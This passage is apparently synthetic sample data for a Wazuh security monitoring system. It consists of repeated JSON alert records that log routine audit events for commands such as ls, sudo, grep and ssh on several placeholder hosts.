/usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: 